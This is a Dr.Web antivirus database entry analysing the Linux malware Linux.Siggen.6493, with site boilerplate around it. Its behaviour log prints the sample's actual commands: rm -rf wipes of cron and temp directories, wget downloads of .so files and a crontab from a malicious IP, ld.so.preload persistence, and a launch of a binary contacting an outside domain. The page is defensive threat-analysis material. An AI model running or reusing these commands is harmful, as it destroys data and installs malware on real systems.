Para el funcionamiento correcto del sitio web, debe activar el soporte de JavaScript en su navegador.
Linux.Siggen.6493
Added to the Dr.Web virus database:
2024-01-26
Virus description added:
2024-01-26
Technical Information
Malicious functions:
Removes itself
Launches itself as a daemon
Launches processes:
rm -rf /var/spool/cron/crontabs/* > /dev/null 2>&1
/usr/lib/apt/methods/http
rm -rf /usr/local/lib/*.so > /dev/null 2>&1
cd /var/tmp; nohup ./tmp -o ns1.disponibletogether.com:443 >/dev/null 2>&1 &
sh -c \x27cd /var/tmp; nohup ./tmp -o ns1.disponibletogether.com:443 >/dev/null 2>&1 &\x27
rm -rf /etc/cron/* > /dev/null 2>&1
rm -rf /tmp/systemd-private-9a696143c12e4a2d879683f675cf06b2-systemd-logind.service-d16u7f /tmp/systemd-private-9a696143c12e4a2d879683f675cf06b2-systemd-timesyncd.service-j0IM1e /tmp/tmux-0
rm -rf /etc/crontab
/usr/bin/dpkg --print-foreign-architectures
rm -rf /var/tmp/* > /dev/null 2>&1
mkdir /var/tmp > /dev/null 2>&1
rm -rf /var/tmp/*. > /dev/null 2>&1
wget -nc http://185.196.9.190/srv/crontab -q -P /etc/crontab 2>&1
rm -rf /tmp/* > /dev/null 2>&1
pkill -9 tmp > /dev/null 2>&1
rm -rf /var/tmp/systemd-private-9a696143c12e4a2d879683f675cf06b2-systemd-logind.service-truN7i /var/tmp/systemd-private-9a696143c12e4a2d879683f675cf06b2-systemd-timesyncd.service-cRu1Gh
chmod 777 /var/tmp/tmp
chmod 777 /var/tmp/tmp > /dev/null 2>&1
/usr/bin/pgrep pkill -9 tmp
wget -nc -q -P /usr/local/lib http://185.196.9.190/srv/initrc.so
rm -rf /usr/local/lib/*.so
rm -rf /var/spool/cron/crontabs/*
chmod 644 /etc/crontab > /dev/null 2>&1
apt update -y > /dev/null 2>&1; apt install cron -y > /dev/null 2>&1
touch /etc/ld.so.preload
rm -rf /var/tmp/tmp
rm -rf /etc/ld.so.preload
wget -nc -q -P /usr/local/lib http://185.196.9.190/srv/pthread.so
rm -rf /etc/cron/*
wget -nc http://185.196.9.190/srv/crontab -q -P /etc/crontab
apt update -y
rm -rf /var/tmp/*.
rm -rf /var/tmp/tmp > /dev/null 2>&1
touch /etc/ld.so.preload > /dev/null 2>&1
chmod 644 /etc/crontab
mkdir /var/tmp
rm -rf /etc/ld.so.preload > /dev/null 2>&1
Kills the following processes:
Performs operations with the file system:
Modifies file access rights:
/var/tmp/tmp
/etc/crontab
/var/lib/apt/lists/partial
/var/lib/apt/lists/auxfiles
Modifies file owner:
/var/lib/apt/lists/partial
/var/lib/apt/lists/auxfiles
Creates folders:
Deletes folders:
/var/tmp/systemd-private-9a696143c12e4a2d879683f675cf06b2-systemd-logind.service-truN7i/tmp
/var/tmp/systemd-private-9a696143c12e4a2d879683f675cf06b2-systemd-logind.service-truN7i
/var/tmp/systemd-private-9a696143c12e4a2d879683f675cf06b2-systemd-timesyncd.service-cRu1Gh/tmp
/var/tmp/systemd-private-9a696143c12e4a2d879683f675cf06b2-systemd-timesyncd.service-cRu1Gh
/tmp/systemd-private-9a696143c12e4a2d879683f675cf06b2-systemd-logind.service-d16u7f/tmp
/tmp/systemd-private-9a696143c12e4a2d879683f675cf06b2-systemd-logind.service-d16u7f
/tmp/systemd-private-9a696143c12e4a2d879683f675cf06b2-systemd-timesyncd.service-j0IM1e/tmp
/tmp/systemd-private-9a696143c12e4a2d879683f675cf06b2-systemd-timesyncd.service-j0IM1e
/tmp/tmux-0
Creates or modifies files:
/etc/ld.so.preload
/usr/local/lib/initrc.so
/usr/local/lib/pthread.so
/var/tmp/tmp
/etc/crontab/crontab
/tmp/#130830 (deleted)
/var/lib/apt/lists/lock
/var/lib/apt/lists/partial/.apt-acquire-privs-test.mNnuKu
/var/lib/apt/lists/partial/.apt-acquire-privs-test.h8xfJq
/var/lib/apt/lists/partial/.apt-acquire-privs-test.JORPEt
Deletes files:
/var/tmp/tmp
/etc/crontab
/tmp/tmux-0/default
/var/lib/apt/lists/partial/.apt-acquire-privs-test.mNnuKu
/var/lib/apt/lists/partial/.apt-acquire-privs-test.h8xfJq
/var/lib/apt/lists/partial/.apt-acquire-privs-test.JORPEt
/var/cache/apt/pkgcache.bin
/var/cache/apt/srcpkgcache.bin
Changes time of creation/access/modification of files:
/etc/ld.so.preload
/usr/local/lib/initrc.so
/usr/local/lib/pthread.so
/etc/crontab/crontab
Network activity:
Establishes connection:
18#.##6.9.190:80
<LOCAL_DNS_SERVER>
DNS ASK:
_h###.##cp.deb.debian.org
_h###.###p.security.debian.org
de#.#ebian.org
se####ty.debian.org
Sends data to the following servers:
Receives data from the following servers:
Other:
Collects OS information
Collects CPU information
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
Descargue Dr.Web para Android
Gratis por 3 meses
Todos los componentes de protección
Renovación de la demo a través de AppGallery/Google Pay
Si Vd. continúa usando este sitio web, esto significa que Vd. acepta el uso de archivos Cookie y otras tecnologías para que recabemos las estadísticas sobre los visitantes. Más información
OK